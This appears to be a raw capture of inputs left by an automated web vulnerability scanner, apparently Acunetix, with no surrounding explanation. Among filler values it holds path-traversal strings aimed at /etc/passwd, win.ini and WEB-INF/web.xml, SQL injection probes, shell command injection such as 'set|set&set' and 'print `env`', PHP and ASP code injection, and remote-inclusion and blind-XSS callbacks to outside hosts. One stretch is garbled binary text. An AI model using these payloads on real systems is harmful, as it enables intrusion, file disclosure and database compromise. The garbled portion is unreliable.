20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
/WEB-INF/web.xml?
20
20
WEB-INFweb.xml?
20
20
20
20
WEB-INF/web.xml?
CWS000x?=?1N?@E߮??I)?@?? ?HiP"D?F?G&َ7??܂?rX;!S??̛????7Jq???.?>?p?c?l??zG?ܾM??dkj?,??(???T?Jj)?"?T7$??H?D6)?x)??ؒ?C?|?Q?Nc?b??? b_&?5 h??g? ]s??0Q?L6?L?_?w~?[?/[?m{?????:n-????.?d1d???6?0
20
20
20
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
acufGkCY𝌆ucafGkCY
20
20
acux8106??z1??z2a?bcxuca8106
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
20
20
/.\./.\./.\./.\./.\./.\./windows/win.ini
"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(97)+CHAR(82)+CHAR(80)+CHAR(101)+CHAR(85)+CHAR(72)+CHAR(53)+CHAR(73))+"
20
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(97)+CHAR(82)+CHAR(80)+CHAR(101)+CHAR(85)+CHAR(72)+CHAR(53)+CHAR(73)) FROM syscolumns)+"
................windowswin.ini
acu10154<s1﹥s2ʺs3ʹuca10154
20
20
"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(97),CHAR(82),CHAR(80),CHAR(101),CHAR(85),CHAR(72),CHAR(53),CHAR(73)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"
................windowswin.ini
20
20
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(97),CHAR(82),CHAR(80),CHAR(101),CHAR(85),CHAR(72),CHAR(53),CHAR(73)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"
20_958722
20
????????????????????????????????????????????????windows??win.ini
/www.vulnweb.com
20
../../../../../../../../../../windows/win.ini .jpg
20
//www.vulnweb.com
20
20
0
20
0
http://www.vulnweb.com
convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(112)+CHAR(49)+CHAR(122)+CHAR(90)+CHAR(54)+CHAR(50)+CHAR(50)+CHAR(90))
../../../../../../../../../../boot.ini
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(112)+CHAR(49)+CHAR(122)+CHAR(90)+CHAR(54)+CHAR(50)+CHAR(50)+CHAR(90)) FROM syscolumns)
20
963658
0
20
(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(112),CHAR(49),CHAR(122),CHAR(90),CHAR(54),CHAR(50),CHAR(50),CHAR(90)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
../../../../../../../../../../windows/win.ini
/www.vulnweb.com
0
20
20
0
and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(112),CHAR(49),CHAR(122),CHAR(90),CHAR(54),CHAR(50),CHAR(50),CHAR(90)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and
patient-review.php/.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
0
20
20
/WEB-INF/web.xml?
patient-review.php
20
0
20
http://hitThiL57egGk.bxss.me/
patient-review.php
20
WEB-INFweb.xml?
0
20
20
20
20
WEB-INF/web.xml?
20
0
20
/../../../../../../../etc/passwd
20
${@print(md5(acunetix_wvs_security_test))}
http://testasp.vulnweb.com/t/xss.html?%00.jpg
0
20
";print(md5(acunetix_wvs_security_test));$a="
-1" OR 3*2>(0+5+523-523) --
20
file:///etc/passwd
;print(md5(acunetix_wvs_security_test));
Array
^(#$!@#$)(()))******
-1" OR 3*2<(0+5+523-523) --
20
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
!(()&&!|*|*|
-1" OR 3+523-523-1=0+0+0+1 --
20
..??..??..??..??..??..??..??..??etc/passwd
20
)
20
-1" OR 2+523-523-1=0+0+0+1 --
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
20
20
1
20
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
20
20
1
testasp.vulnweb.com
/etc/passwd
20&n923111=v980088
1
http://testasp.vulnweb.com/t/fit.txt?.jpg
.\./.\./.\./.\./.\./.\./etc/passwd
20
Http://testasp.vulnweb.com/t/fit.txt
1
20
/../..//../..//../..//../..//../..//etc/passwd .jpg
1some_inexistent_file_with_long_name .jpg
20
20
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
20
20
20
20
-1 OR 3*2>(0+5+402-402)
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
20
20
-1 OR 3*2<(0+5+402-402)
${9999326+10000497}
../../../../../../../../../../etc/passwd .jpg
20
-1 OR 3+402-402-1=0+0+0+1
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
20
;set|set&set;
-1 OR 2+402-402-1=0+0+0+1
../../../../../../../../../../etc/passwd
print `env`
-1 OR 3*2>(0+5+293-293) --
20
`set|set&set`
-1 OR 3*2<(0+5+293-293) --
20
20
set|set&set
-1 OR 3+293-293-1=0+0+0+1 --
"set|set&set"
NmNMqdLt
-1 OR 2+293-293-1=0+0+0+1 --
20
20
"+response.write(9223332*9906584)+"
set|set&set
20
response.write(9223332*9906584)
20